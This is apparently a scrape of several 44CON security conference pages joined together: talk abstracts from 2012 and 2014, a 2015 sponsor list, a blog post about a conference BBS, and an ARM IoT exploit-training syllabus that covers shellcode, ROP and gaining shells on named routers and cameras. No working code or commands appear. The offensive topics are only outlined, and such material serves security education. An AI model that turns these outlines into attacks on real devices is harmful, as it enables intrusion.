          With the growing concern about low-cost attacks on secure hardware there is a need for better understanding how those attacks work. Even when the information is encrypted, the determined attacker can learn the key through side-channel leakages or via fault injection attacks. I will present low-cost attack technologies which should be considered by hardware developers.

          Hardware assurance is another big area of concern for developers and consumers as modern semiconductor chips are complex enough to become vulnerable to malevolent activities in the form of Trojan and backdoor insertion. An adversary can introduce Trojans into the design during a stage of fabrication by modifying the mask at a foundry. It could also be done by third parties in the design blocks or by malicious insiders at the design house. My recent research demonstrates how such backdoors can be found using side-channel analysis techniques.


          I’m the butcher, would you like some BeEF?

          Presented by: Thomas Mackenzie, Michele Orru

          Recently a lot of focus in BeEF has been towards developing cool new features that help the day to day job of a social engineer, hereafter known as “The Butcher”.

          We have been working very hard and secretively in the last months to widen our range of meaty goods within the Browser Exploitation Framework. During this talk we will release new modules and extensions specifically aimed toward automating the technical parts of a social engineer attack.

          Employing techniques that are currently used is great, however “The Butcher” wishes to impart knowledge upon the attendees regarding new techniques that employ successful vectors targeting different browser within different security contexts.

          After introducing people to the project who may have never heard of it before, we will be sharing information about real social engineering / penetration testing work that we have done recently and how we have advanced BeEF to achieve maximum coverage. This includes:

          • Website Cloning: but you haven’t seen it like this before!
          • Email Spoofing: mass email, easy
          • Browser Control / Pwnage Automation: control BeEF programmatically using the RESTful API
          • Maintaining Connectivity: you have met man in the middle, meet man in the browser

          2012 in review: Tor and the censorship arms race

          Presented by:  Runa A. Sandvik

          Kazakhstan blocked Tor using Deep Packet Inspection in January 2012. China started probing Tor bridges using a system that is aimed directly at Tor, and using code that actually speaks the Tor protocol. Iran started blocking SSL connections on Valentine’s Day, in preparation for its “halal” Internet. Mobile operators in the US and the UK continue to filter and censor websites for customers. The government in the UK proposed plans for mass surveillance. Activists in Iran and Syria were targeted with malware, and the government in Kuwait proposed plans to regulate the use of social networking sites.

          These are some of the Internet censorship events we have seen so far in 2012, and we have only scratched the surface. In this presentation,  I will talk about how the blocking is done (in terms of what signatures are filtered in Tor, and how we have gotten around the blocking in each case), and what technologies are being used to filter Internet traffic — including the use of Western technology to operate the surveillance and censorship infrastructure in the Middle East.

          I will cover what we have learned so far about the mindset of the censor, as well as the users being censored, and how we can measure and track the wide-scale censorship in these countries using a framework we have developed. Lastly, I will explain Tor’s development plans to continue to evade censorship and enable thousands of users around the world to access a free and open Internet.


          Post-Exploitation Tu-Dot-Oh!

          Presented  by: Rich Smith

          As the technology landscape evolves to embrace new paradigms & usage patterns, consideration must be given to the effects these changes have on the attack tooling and strategies used in the assessment of this dynamic environment. This presentation focuses on how approaches to post-exploitation can be altered to meet these changing technologies,

          along with the considerations those undertaking such attack assessments should be aware of.

          A novel proof of concept implant will be demonstrated and discussed to show how a number of currently used post-exploitation techniques can be improved upon to better provide the capabilities required for long term, complex attack engagements against todays changing infrastructure.


          Security Testing 4G (LTE) Networks

          Presented by: Martyn Ruks, nils

          4G is here, or more accurately LTE implementations (another way of saying 4G) are being trialled and will be rolled out more widely in the UK in the near future. One of the changes in LTE networks is the use of IP for all communications between components, this improves scalability but does it also increase the risk of successful compromise? MWR have been working with a number of major players in this space and have gained significant experience in the technology, learning how it can be security tested and ultimately how it should be secured. This talk will provide an overview of the security of 4G networks and more importantly how they should be tested. From this talk the audience will take away a better understanding of LTE deployments, how they could be attacked and how we can gain assurances about their security.


          What the HEC? Security implications of HDMI Ethernet Channel and other related protocols

          Presented by: Andy Davis

          VGA is dead (or at least dying), long live HDMI! The VGA socket on the back out your PC is 25 years old and with new PCs and laptops we’re starting to see a change – to HDMI, but under the hood this brings many other capabilities than just displaying video.

          At Black Hat Europe 2012 I discussed the security of the EDID protocol which allows displays to communicate their capabilities to hosts over interfaces such as HDMI and VGA. I also touched on a number of other, very new HDMI-based protocols: CEC (Consumer Electronics Control) and HEC (HDMI Ethernet Channel). In this talk I will focus on the security of these protocols, how they will affect consumer network security and also their implications in the corporate world. I will also demonstrate a CEC security testing tool called CECSTeR.


          Malware analysis as a hobby

          Presented by:  Michael Boman, Siavosh Zarrasvand

          How can one with limited time and budget create an environment that analyses suspected sites and software for malicious behaviour at speed? For one thing you need to engineer yourself out of the equation, and this is how we did it.


          An Idiot Abroad

          Presented by: Don A. Bailey

          Travel seems less tedious and scary than ever before in history. We can sit in a temple thousands of years old in east Java while using Java to browse the Internet on our mobile phone. We can MMS photos of ourselves covered in painted spices during Holi in Bombay. But, what about how we feel about our environment beyond the phone and the laptop? Our environment is becoming more entwined with our technological presence. With Zigbee, Low Power Bluetooth, RFID, and NFC, we can integrate our preferred environmental preferences more and more in the modern world, from casinos in Las Vegas to five star villas in Singapore. But, what controls these systems? And how are they affected by security? And how can the security of these seemingly simple devices affect us? “An Idiot Abroad” will demonstrate how the components at the core of traffic control systems, IP cameras, security access units, and electrical control systems, are all affected by security weaknesses. The presenter will demonstrate how patterns can be detected in firmware where symbols and other compilation options are not necessarily present, which allow attackers or reverse engineers to find vulnerabilities and critical sections of code quickly and efficiently. Examples will be given of how to take a little known microcontroller and reverse engineer the firmware, in some cases without even having access to the instruction set. Then, the presenter will demonstrate how vulnerabilities in these simple devices can lead to interesting, and sometimes dangerous, exploits.


          Toppling Domino – Testing security in a Lotus Notes environment.

          Presented by: Darren Fuller

          Although there have been a number of technical papers published by different researchers covering Lotus Notes/Domino security it is rarely covered by the wider pen testing community.  In this presentation I’ll aim to give a general overview of Domino security and demonstrate ways of breaking in.  This will cover security issues from the point of view of the webserver, native Domino server and demonstrate some tricks you can use from the client side of things.


          PinPadPwn

          Presented by: nils, Rafael Dominguez Vega

          Pin Pads or Payment Terminals are widely used to accept payments from customers. These devices run Payment Applications on top of the device specific firmware. It shouldn’t come as no surprise to anyone that these applications and operating systems are just as vulnerable as any other systems when it comes to handling user input.

          As the use of Chip and Pin continues to replace the fairly basic magnetic stripe cards, these devices are handling more and more complex information from untrusted sources; namely the EMV protocol spoken by all major payment smart-cards. On top of this many of these terminals are connected through Ethernet, GPRS, WiFi or phone lines, which add to the overall attack surface.

          We will demonstrate that memory corruption vulnerabilities in payment terminals and applications are a reality and that they can be used to gain code execution on the terminals. Furthermore we will demonstrate and discuss potential payloads and how these can profit an attacker.


          Surveillance cameras. The real-world has them everywhere, why not your computer?

          Presented by: Michael Viscuso

          There are hundreds if not thousands of real-time detection and prevention products on the market, all claiming to defend your assets against the most sophisticated attackers.  But the headlines uncover the truth… “75,000 Facebook passwords stolen”, “RSA hacked!”, “Criminals steal $6.7M in cyber bank heist”, “Zappos resets 24 million users’ passwords”. Each one of these companies had firewalls in place, up to date anti-virus signatures, the most sophisticated email filtering, etc.  What’s wrong?  Why are digital assets so hard to protect?

          This presentation will take a deeper look into “the hacker problem” – from a hacker’s perspective – and let you in on the secrets that will change your approach to security forever.

          There will be further updates – in addition there are still  Fast Track talks and the Workshops that will be happening during 44Con 2012  to be announced.

          Note: Talks are subject to change.

          #####EOF##### 44CON LONDON 2015 Sponsors – 44CON

          44CON LONDON 2015 Sponsors

          Platinum Sponsor
          nccgroup

          NCC Group

          http://www.nccgroup.com

          NCC Group is a leading global information assurance company, providing freedom from doubt that all critical material is available, protected, and operating as it should be at all times. Information assurance is delivered through escrow and verification, security testing, audit and compliance, software testing and web performance services.

          Gold Sponsors
          MWR InfoSecurity

          MWR InfoSecurity

          http://www.mwrinfosecurity.com

          Established in 2003, MWR InfoSecurity is a research-led information security consultancy. MWR consults with clients around the world, providing specialist advice and services on all areas of security, from mobile through to supercomputers. As a company we invest heavily in knowledge sharing and we are proud to be a part of an event that provides a platform for discussion on the latest thinking and research in the InfoSec arena.

          Digital Shadows

          Digital Shadows

          http://www.digitalshadows.com

          Digital Shadows provides cyber situational awareness that helps organizations protect against cyber attacks, loss of intellectual property, and loss of brand and reputational integrity. Its flagship solution, Digital Shadows SearchLight™, is a scalable and easy-to-use data analysis platform that provides a holistic view of an organization’s digital footprint and the profile of its attackers. It is complemented with security analyst expertise to ensure extensive coverage, tailored intelligence and frictionless deployment. The company is jointly headquartered in London and San Francisco.

          Context Information Security

          Context Information Security

          http://www.contextis.com

          Context is an independently operated cyber security consultancy, founded in 1998 and focusing on providing highly skilled consultants to help organisations with their information security challenges. We work with some of the world’s most high profile blue chip companies and government organisations.

          BAE Systems Applied Intelligence

          BAE Systems Applied Intelligence

          http://www.baesystems.com/home?r=ai

          BAE Systems Applied Intelligence delivers solutions which help our clients to protect and enhance their critical assets in the connected world. Our solutions combine large-scale data exploitation, ‘intelligence-grade’ security and complex services and solutions integration. We operate in four key domains of expertise: Cyber Security; Financial Crime; Communications Intelligence; and Digital Transformation.

          Silver Sponsors
          Raytheon|Websense

          Raytheon|Websense

          http://www.websense.com/content/home.aspx

          Headquartered in Austin, TX, Raytheon|Websense is a leading provider of solutions to defend global industry and infrastructure against a rapidly growing level of sophisticated threats posed by well-funded adversaries and criminal networks. It enables commercial and government organisations to manage their cybersecurity risk through an advanced and integrated cybersecurity platform that protects critical data, wherever it resides, and gives actionable intelligence across the entire threat lifecycle.

          Microsoft

          Microsoft

          http://www.microsoft.com/security

          Microsoft is proud to be a continuing sponsor of the 44CON. We appreciate 44CON providing a unique forum in which security researchers from all over the world, IT Pros and industry luminaries can gather to share insights, knowledge and information to advance security research. Microsoft remains dedicated to software security and privacy and continues to collaborate with the community of people and technology organizations helping to protect customers and the broader ecosystem, Microsoft is also dedicated to software security and privacy.

          BT

          BT

          http://www.bt.com/letstalk/security

          BT is one of the world’s leading providers of communications solutions and services operating in 170 countries. Its principal activities include networked IT services; local, national and international telecommunications services; higher-value broadband and internet products and services and converged fixed/mobile products and services.

          Black Duck Software

          Black Duck Software

          https://www.blackducksoftware.com

          Black Duck solutions help security and development teams identify and mitigate open source related risks across an application portfolio. Black Duck is the only security solution that provides the industry’s most complete open source software KnowledgeBase and the most comprehensive language coverage and development-tools integration. With Black Duck, organizations can scan code to identify specific open source code in use and automatically map this code to industry-identified security vulnerabilities. Black Duck also empowers organizations to identify licenses and community activity, assess risk, and prioritize and track remediation efforts.

          Other Event Sponsors
          Tiger Scheme

          Tiger Scheme

          http://tigerscheme.org

          Tiger Scheme is an independent certification scheme that gives those commissioning security testing services confidence that they were hiring an individual or company that has been assessed to the highest standards. Tiger Scheme provides career progression through intermediate and senior level certification and technical specialist roles.

          CREST

          CREST

          http://www.crest-approved.org

          CREST is a not-for-profit organisation that represents the technical information security industry, primarily penetration testing, cyber security incident response and security architecture services.

          CREST offers public and private sector organisations an assurance that the technical security advisors they appoint are competent, qualified and professional with current knowledge. It also ensures that the CREST member companies they engage with have the appropriate processes and controls in place to perform the services for which they have been appointed and protect sensitive client-based information.

          CheckSec

          CheckSec

          http://www.checksec.com/

          Founded in 2011, CheckSec’s mission is to rid the security industry of inefficiency, so security teams can focus on what really matters. With this goal in mind, we created Canopy to bring standardisation and automation to security assessment delivery.

          Encription
          PenTest Partners

          PenTest Partners

          http://www.pentestpartners.com

          Pen Test Partners LLP is a CHECK & CREST accredited pen testing company that is approved by the PCI Council to undertake card breach work as a PCI PFI. We investigate roughly half of all credit card data breaches in the UK which provides us with excellent real-time threat intelligence, used to augment our testing. We are a limited liability partnership for a very good reason; being in a partnership means that our people are heavily invested the company. It’s that employee ownership which inspires and drives the quality in what we do.

          Logically Secure

          Logically Secure

          http://www.cyber-cpr.com

          CyberCPR is a safe haven where Incident Managers, Analysts, Executives and support staff can plan and coordinate cyber incident remediation activities. Designed by seasoned IR professionals CyberCPR is designed support staff so they can work faster and more efficiently on all aspects of IR thus reducing organisational risks and saving money.

          Event Partners
          Antipøde

          Antipøde

          http://www.blackandwhitecoffee.co.uk

          Having spent many years in Brisbane, Australia, behind the machines in a few of its most renowned coffee hangouts; Harvey’s (under chef PJ McMillan), Au Cirque and The Little Larder, it became quickly apparent after moving to London, that the city was crying out for the simple things in life, like a good flat white.

          Our Raison d’être is simple – to provide the London public with the quality and standards associated with Australian coffee culture.

          ESW Solutions

          ESW Solutions

          http://www.eswav.com

          Founded in 1995, ESW Solutions has quickly become a major force in the Audio Visual industry – building on its first class reputation for customer service, quality and commitment. From a large multi room European conference to a small meeting we have the experience to make your event successful. We also produce live events for a wide range of clients, Awards Ceremonies, Talent Competitions, Festival Stages etc.

          ESW is also the home to Talking Slides a unique product that gets content presented at your conference online and ready to view in a simple, cost-effective and hassle-free manner. We attend your event and capture the presentations as they happen. However, the recording of your event is just the beginning.

          We take the high-definition presentation recordings and host them within our Talking Slides management system, complete with search facilities, registration options and even pay-per-view access.

          #####EOF##### The ARM IoT Exploit Laboratory 2019 Edition – 44CON

          The ARM IoT Exploit Laboratory 2019 Edition

          Presented By: Saumil Shah

          ARM has emerged as the leading architecture in the Internet of Things (IoT) world. The all new ARM IoT Exploit Laboratory is a 3-day intermediate level class intended for students who want to take their exploit writing skills to the ARM platform. The class covers everything from an introduction to ARM assembly all the way to Return Oriented Programming (ROP) on ARM architectures. Our lab environment features hardware and virtual platforms for exploring exploit writing on ARM based Linux systems and IoT devices.

          The class concludes with an end-to-end “Firmware-To-Shell” hack, where we extract the firmware from a popular SoHo router and an IP Camera, build a virtual environments to emulate and debug them, and then build exploits to gain a shell on the actual hardware devices.

          The 3 day course will take place on the 9th, 10th and 11th of September 2019 at the Novotel London West
          Cost is £ 1,950 (inc VAT). Buy your place in our shop now.

          Learning Objectives

          • Introduction to the ARM CPU architecture
          • Exploring ARM assembly language
          • Understanding how functions work in ARM
          • Debugging on ARM systems
          • Exploiting Stack Overflows on ARM
          • Writing ARM Shellcode from the ground up
          • Introduction to Return Oriented Programming
          • Bypassing exploit mitigation using ROP
          • Practical ARM ROP
          • An Introduction to extracting firmware from devices
          • Emulating and debugging a SoHo router’s firmware in a virtual environment
          • “Firmware-To-Shell” – exploiting an actual SoHo router
          • “Firmware-To-Shell” – exploiting an actual IP camera
          • The Lab environment is a mixture of physical ARM hardware and ARM virtual machines.

          Course Outline

          Day 1:

          • Introduction to the ARM CPU architecture
          • Exploring ARM assembly language
          • EXERCISE – Examples in ARM Assembly Language
          • Debugging on ARM systems
          • Understanding how functions work in ARM
          • Exploiting Stack Overflows on ARM
          • EXERCISE – ARM Stack Overflows

          Day 2:

          • Writing ARM Shellcode from the ground up
          • EXERCISE – Embedded Web Server exploit
          • Introduction to Exploit Mitigation Techniques (XN/DEP and ASLR)
          • Introduction to ARM Return Oriented Programming
          • Bypassing exploit mitigation on ARM using ROP
          • ARM ROP Tools
          • EXERCISE – Searching for ARM ROP Gadgets

          Day 3:

          • Practical ROP Chains on ARM
          • EXERCISE – Exploit featuring ARM ROP Chains
          • Bypassing ASLR
          • An Introduction to firmware extracting
          • Discovering an IoT devices’ serial pins and extracting actual firmware via serial console
          • Emulating and debugging a SoHo router’s firmware in a virtual environment
          • EXERCISE – Attacking a DLINK DIR-880L ARM Router – from firmware to shell
          • EXERCISE – Attacking a Trivision ARM IP Camera – from firmware to shellTarget Audience

          Target Audience

          • Past x86 Exploit laboratory students who want to take their elite exploitation skills to the ARM platform.
          • Pentesters working on ARM embedded environments. (SoCs, IoT, etc)
          • Red Team members, who want to pen-test custom binaries and exploit custom built applications.
          • Bug Hunters, who want to write exploits for all the crashes they find.
          • Members of military or government cyberwarfare units.
          • Members of reverse engineering research teams.
          • People frustrated at software to the point they want to break it!

          Student Requirements

          • A conceptual understanding of how functions work in C programming
          • Knowledge of how a stack works, basic stack operations
          • Familiarity with debuggers (gdb, WinDBG, OllyDBG or equivalent)
          • Not be allergic to command line tools.
          • Have a working knowledge of shell scripts, cmd scripts or Perl or Python.
          • If none of the above apply, then enough patience to go through the pre-class tutorials.
          • SKILL LEVEL: INTERMEDIATE (leaning towards advanced)

          Pre-Class Tutorials:

          The following tutorials have been specially prepared to get students up to speed on essential concepts before coming to class.

          a) Operating Systems – A Primer
          http://www.slideshare.net/saumilshah/operating-systems-a-primer

          b) How Functions Work
          http://www.slideshare.net/saumilshah/how-functions-work-7776073

          c) Introduction to Debuggers
          http://www.slideshare.net/saumilshah/introduction-to-debuggers

          What to Bring

          • A working laptop (no Netbooks, no Tablets, no iPads)
          • Intel Core i3 (equivalent or superior) required
          • 8GB RAM required, at a minimum
          • Wireless network card
          • 40 GB free Hard disk space
          • If you’re using a new Macbook or Macbook Pro, please bring your dongle-kit!

          Software Requirements

          • Linux / Windows / Mac OS X desktop operating systems
          • VMWare Player / VMWare Workstation / VMWare Fusion MANDATORY
          • Administrator / root access MANDATORY

          Students will be provided with

          Students will be provided with all the lab images used in the class. The ARM IoT Exploit Laboratory uses a “Live Notes” system that provides a running transcript of the instructor’s system to all the students. Our lab environment, plus about 800MB of curated reading material, will be made available to all attendees to take with them and continue learning after the training ends.

          About the Trainer

          Lead Instruction – Saumil Shah @therealsaumil

          Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients around the globe. Saumil is an internationally recognised speaker and instructor, having regularly presented at conferences like Blackhat, RSA, CanSecWest, PacSec, EUSecWest, Hack.lu, Hack-in-the-box and others. He has authored two books titled “Web Hacking: Attacks and Defense” and “The Anti-Virus Book”.

          Saumil graduated with an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time breaking software, flying kites, traveling around the world and taking pictures.

          Instructor’s Contact Info:
          Saumil Udayan Shah
          CEO, Net-Square Solutions Pvt. Ltd.
          Twitter: @therealsaumil

          Book your 44CON 2019 training course now!

          #####EOF##### Facebook
          Log into your Facebook account to share.
          Create New Account
          #####EOF##### Building A Permanent Community At 44CON – 44CON

          Building A Permanent Community At 44CON

          44CON’s always been the kind of place where you turn up, hang out with friends old and new, get your head bent then go home and get on with your life. But we want to do more than that. We’re building a permanent community for everyone, whether you come to 44CON or not. We’re also mostly old(er Steve, damnit! – A) and riddled with nostalgia. Instead of using Snapbook, or Slickchat or whatever the cool kids use, we thought we’d build a traditional Bulletin Board System and drag it kicking and screaming into the modern age.

          To say this was a bad idea was an understatement. Our first attempt used a hodge-podge of Docker, a piece of DOS-based software last updated before the average attendee was born and one instance of a DOS emulator per connection. It worked, but was telnet only (thanks to the joys of serial emulation) and was very, very unstable.

          In the end we settled on a modern BBS implementation that has a learning curve almost as steep as Radare2, but allows us to do cool modern things, like provide access over SSH and HTTPS. Originally we worked on supporting older platforms like the BBC Micro, C64 and ZX Spectrum, but everything old struggled with newer software, and everything new struggled with older software.

          Finally, we have something we think you’re going to love. Registration will open on the 12th of September. May we present the official 44CON rumour mill, Juicy HQ:

          Screen Shot 2018-08-29 at 20.37.05

          For those of you who’ve never used a BBS before, the first thing you need to know is that you apply for an account (register). Once you’ve filled in a form, you’ll be taken to the new scan screen. This is to check for updates since you last logged on. There are public and private message areas, file uploads (check out our collection of classic British hacking textfiles, or our PoC||GTFO archive) and you can play multiplayer old-school BBS games courtesy of our DoorParty setup. If things seem a little less interactive, remember that BBSes were typically built to serve very few, if any concurrent users, and most content was downloaded in batches for later offline use.

          Screen Shot 2018-08-30 at 11.24.12

          Screen Shot 2018-08-30 at 11.14.03Most British people never really got to use dial-in BBSes back in the day due to BT’s monopoly and pricing, although Prestel and Micronet had some popularity. There was one information system that every British person had access to, which was Teletext. On the BBC, we had Ceefax. So we built our BBS around a Ceefax theme, although you might spot the odd reference to Teletext classics such as Bamboozle and even Digitiser. And yes, all of this is accessible in a web browser.

          Screen Shot 2018-08-29 at 20.37.41

          Although Juicy HQ is the official 44CON BBS, it’ll be open to everyone from the 12th of September. Whether you’ve been to 44CON or not, live in the UK or not, or if you’ve never been to a conference before, all are welcome providing Wheaton’s law is followed at all times.

           

           

          Screen Shot 2018-08-29 at 20.38.33

          We’re still refining Juicy HQ in preparation for launch, but we’re making sure there’s plenty of easter eggs for you to find. If you’re interested in beta testing the BBS, give Steve a shout on twitter or mastodon and he’ll hook you up.

          #####EOF##### Facebook
          Log into your Facebook account to share.
          Create New Account
          #####EOF##### 44CON 2014 Presentations – 44CON

          44CON 2014 Presentations

          Chicken of the ‘APT’: Using Shadowlab Incubation for Targeted Attack Attribution

          Presented By: Kyle Wilhoit

          Attribution of attackers and motives is often difficult. Trying to understand what tactics they use, malware they utilize, and what groups they belong to can be a tedious task. These attackers are often targeting specific organizations, individuals, and countries things that sandboxes and dynamic analysis techniques rarely have the ability to emulate. In this talk, we’ll cover targeted malware incubation and present two case studies of never released details on how attackers have fallen victim to incubation. The talk will finally finish with the release of an open source incubator Shadowlab, giving everyone the ability to incubate malware.


          GreedyBTS: Hacking Adventures in GSM

          Presented By: Hacker Fantastic

          There are over 2.9 BILLION subscribers on GSM networks today. How many of these subscribers are susceptible to trivial attacks that can leave phone calls, text messages and web surfing habits accessible to an attacker? This talk intends to discuss the reasons why GSM networks are still vulnerable today and demonstrate attack tools that might make you re-think how you handle sensitive data via your phone. The presenter will discuss his own experience of analysing GSM environments and provide a demonstration of GreedyBTS which can be used to compromise a targets phone calls, messaging and web surfing habits. Mobile Phones will be harmed during this presentation.


          Chopping Down Mountains

          Presented By: Don A. Bailey

          Most people thought the destruction of digital currency would come from vulnerabilities identified in the protocol or end-user software. The decentralized nature of the technology implies that there is no one vector for attacking Bitcoin, Dogecoin, and other currencies. However, there are much easier ways to kill a coin. The fall of Mt. Gox proved that centralization occurs in the exchange and other companies attempting to facilitate trade. Attacks against these exchanges and merchant payment systems can easily destroy not only a digital currency business, but the coin itself.

          In this presentation, the presenter will reveal undiscovered security risks that have not yet been disclosed or mitigated by digital exchanges. After explaining how these risks can cripple not only exchanges but the currencies themselves, the presenter will discuss the real and practical methods for solving these issues.

          Digital currency is an exciting revolution in the way wealth is distributed among worldwide populations. Solving the underlying security issues that hinder its widespread adoption may assist in enabling the distribution of wealth to the regions and individuals that need it most.

          To the moon!


          Researching Android Device Security with the Help of a Droid Army

          Presented By: Joshua J. Drake

          In the last few years, Android has become the world’s leading smart phone operating system. Unfortunately, the diversity and sheer number of devices in the ecosystem represent a significant challenge to security researchers. Primarily, auditing and exploit development efforts are less effective when focusing on a single device because each device is like a snowflake: unique.

          This presentation centers around the speaker’s approach to dealing with the Android diversity problem, which is often called “fragmentation”. To deal with the issue, Joshua created a heterogeneous cluster of Android devices. By examining and testing against multiple devices, you can discover similarities and differences between devices or families of devices. Such a cluster also enables quickly testing research findings or extracting specific information from each device.


          Social Engineering Your Own – Developing An Awareness Training Program That Actually Works

          Presented By: Valerie Thomas

          Organizations must establish an effective security awareness program. As security professionals we’ve likely heard (and said) it more times than we can count. But how often do we stop to think about what it actually means or how it can be implemented? The media is littered with reports of attacks, which emphasizes that it’s time to change the way we approach awareness training. It’s time to lose the never-changing slide deck and think outside the box. In this talk we’ll examine the art of influence at a group level and use social engineering to create positive change.


          What Did You Just Say To Me?

          Presented By: Jerry Gamblin

          Imagine you have to explain a newly discovered vulnerability in the human resources software your company uses to the director of human resources who forgets his password 3 times a week. How would you approach that talk?

          It takes many skills to be an effective security professional but arguably the most important trait for a security professional is the ability to communicate effectively. In this talk we will discuss the best methods to explain complex security issues with non-technical people and I will share the tools and tips I have used to become better at this.


          Flushing Away Preconceptions of Risk

          Presented By:  Thom Langford

          Risk is often seen as a dirty word in business. It is a thing that needs to be reduced to nothing, and has no possible good use in an organization, especially a security programme.

          This couldn’t be more wrong! Risk is an inherent part of any business, and yet it is often poorly recognized and leveraged in the security organisation. In this presentation Thom will look at three areas of the risk conundrum to open the veil on the elusive art of understanding and ultimately measuring risk.


          Security Analytics Beyond Cyber

          Presented By: Phil Huggins

          A quick summary of the current state of big data technology and data science approaches used in cyber / network defender security analytics including summary use cases, a walk through of a reference architecture and breakdown of the required skills. Focus is on the knowledge needed to run a proof of concept and establish a programme for early benefits. Will then also include a view on the future of extending the platforms and capabilities of security analytics to cover performance metrics and data-driven security management approaches.


          Hot or not, the hacker way

          Presented By: Dan Tentler

          Thermal imaging has been a subject that not many people get the opportunity to research, without an exceedingly high number of dollars on the table. This pet project of mine began in 2010 when I asked FLIR for a demo unit to do a series of tests in an effort to see how infrared could be used in the world of information security. Their PR people replied to me saying that they didn’t think a FLIR device could be used to read heat signatures from a computer because they weren’t sensitive enough. This year I got my hands on a FLIR E4, and hacked it to have 4x the resolution. Boy was that PR guy wrong.

           


          Using Hadoop for Malware, Network, Forensics and Log analysis

          Presented By: Michael Boman

          The number of new malware samples are over a hundred thousand a day, network speeds are measured in multiple of ten gigabits per second, computer systems have terabytes of storage and the log files are just piling up. By using Hadoop you can tackle these problems in a whole different way, and “Too Much Data to Process” will be a thing of the past.

           


          I gave a talk about robots and hardware!

          Presented By: Josh Thomas

          ”…and therein lies the Android problem…” Vendors, service providers, handset manufacturers, an insane number of different devices, patch stagnation, lack of updates, blah, blah, blah. We get it, and honestly it’s starting to be a tad boring. So why would you want to sit through yet another Android talk? You don’t, and I don’t want to give that talk anyway.

          Instead, let us spend some time talking about the roots of all smartphones: The hardware design, the system on chip internals, the problematic linux kernels. Let’s chat about design reuse and how to take advantage of lazy electronic engineers. Let’s converse about generational design flaws and how they can be exploited. In short, let’s talk about breaking a bunch of expensive toys.

          This talk will cover multiple handset manufacturers internal PCB designs, a fair bit of Qualcomm exploration, some witty banter about the fossil-esque linux kernel we drag about daily and probably some childish poking at the trusted boot process


          Payment applications handle lots of money. No, really: lots of it.

          Presented By: Mark Swift & Alberto Revelli

          A medium-sized bank will funnel hundreds of billions through payment gateways every year. A larger one will easily be deep in ‘trillions’ territory. You work for a company with significant revenue? Chances are that your company shoves lots of money through one of these applications.

          Surprisingly, however, the security of these apps is often flaky: people who understand the business process rarely understand the technical risks. Vendors and consultants often recommend business-level defences but then make horrible technical mistakes, and very often the overall defence strategy boils down to “DBAs do not understand the business” comedy. When it comes to crypto, hilarity ensues: shared private keys and broken algorithms become the norm, with self-proclaimed “experts” proving to have problems with exotic concepts like “hash function” and “birthday paradox”, leading CISOs to a false sense of security that only makes things worse.

          Our presentation is a mix of attack and defence, combining descriptions of business-level and tech-level threats with crypto-based countermeasures. It is the result of a project we have been working on for the past year, with the goal of using crypto to secure our payment applications.

          The presentation will start describing how payment applications work, what is their workflow, what a payment file “really looks like”, how it is created, handled and processed. We will then describe the attack surface of the whole process, how an employee in the right role can easily steal large amounts of money, and what checks and countermeasures he/she would need to bypass.

          In the second part of the presentation, we will then describe a real-world example of how to properly employ crypto (via an HSM-based infrastructure) to greatly reduce the risks, and how to integrate such a solution with existing applications. We will also include some examples of things that are easy to get wrong while designing the solution.


          10 GBP simple hardware side channel attacks

          Presented By: Joe FitzPatrick

          Most dismiss power side channel attacks as difficult, expensive and unlikely, and are therefore out of scope for many security evaluations. Recent presentations have demonstrated how to get this cost down to a few hundred dollars using low-cost, high performance analog components alongside current high performance FPGAs.

          By simplifying both the target hardware and the analysis, I aim to present a series of simple examples of timing and power analysis attacks on microcontroller hardware that require no advanced math and can be done in the comfort of your home for less than $20 in parts.


          Manna from Heaven; Improving the state of wireless rogue AP attacks

          Presented By: Dominic White

          The current state of theoretical attacks against wireless networks should allow this wireless world to be fully subverted for all but some edge cases. Devices can be fooled into connecting to spoofed networks, authentication to wireless networks can either be cracked or intercepted, and our ability to capture credentials at a network level has long been established. Often, the most significant protection users have are hitting the right button on an error message they rarely understand. Worse for the user, these attacks can be repeated per wireless network allowing an attacker to target the weakest link.

          This combination of vulnerable and heavily used communications should mean that an attacker needs just arrive at a location and setup for credentials and access to start dropping from the sky. However, the reality is far from this; karma attacks work poorly against modern devices, network authentication of the weakest sort defeats rogue APs and interception tools struggle to find useful details.

          This talk is the result of our efforts to bring rogue AP attacks into the modern age. The talk will provides details of our research into dramatically increasing the effectiveness of spoofing wireless networks, and the benefits of doing so (i.e. gaining access). It includes the release of a new rogue access point toolkit implementing this research.


          On Her Majesty’s Secret Service: GRX and a Spy Agency

          Presented By: Stephen Kho

          GPRS Roaming eXchange (GRX) has been in mainstream media recently as part of the high profile Edward Snowden revelations. The leaked documents indicated that the UK government’s intelligence organisation, Government Communications Headquarters’ (GCHQ) hacked the Belgian GRX provider, Belgacom International Carrier Services (BICS). They did this by targeting the GRX provider’s employees with the ultimate aim of gaining access to Belgacom’s Core GRX routers. Allegedly, GCHQ hacked the GRX routers in order to carry out man-in-the middle “traffic sniffing” attacks against mobile users who are roaming with smartphones or other devices capable of handling data.


          Automatic Reverse Compilation & Semantic Comprehension

          Presented By: Christopher Abad

          The machine code to source code problem can be simplified by relaxing the problem constraints and allowing translation from machine code to any reasonably sound higher-level code interpretation instead of expecting a close approximation of the original source code. As a corollary, any solution to the problem also demonstrates semantic comprehension of the machine code.Automatic reverse compilation of machine code to source code and the semantic comprehension of machine code without code execution or emulation can be achieved by combining techniques used in data compression, automatic differentiation, linear algebra, mathematical logic, syntactic analysis and statistical classification. A simplified application of the same tools can be applied to predict pseudo-random numbers and sequences of other mathematical objects.

          Darshak: how to turn your phone into a low cost IMSI catcher device

          Presented By: Ravishankar Borgaonkar & Swapnil Udar

          It is said that 80% of the world’s population now has a mobile phone. They use mobile devices to make call, send SMS message, to access internet via the cellular network infrastructure. End-users carrying mobile phones 24 hr trust cellular network operators and believe that provided mobile communication link is secure.

          However, on the other hand, mobile operators, device manufacturers, OS providers, baseband suppliers do little to provide best security and privacy features to them. In particular, security capabilities of mobile communications are not shown to the end-users. Hence it is easy for malicious attackers to mount subsequent attacks using IMSI catcher equipments. Further some hidden features for example ‘silent SMS’, are supported in currently used mobile telephony systems but not notified to the end users when in use. Attackers or illegitimate agencies exploit this weakness to track user movements regularly without user’s consent.


          Stupid PCIe Tricks

          Presented By: Joe FitzPatrick

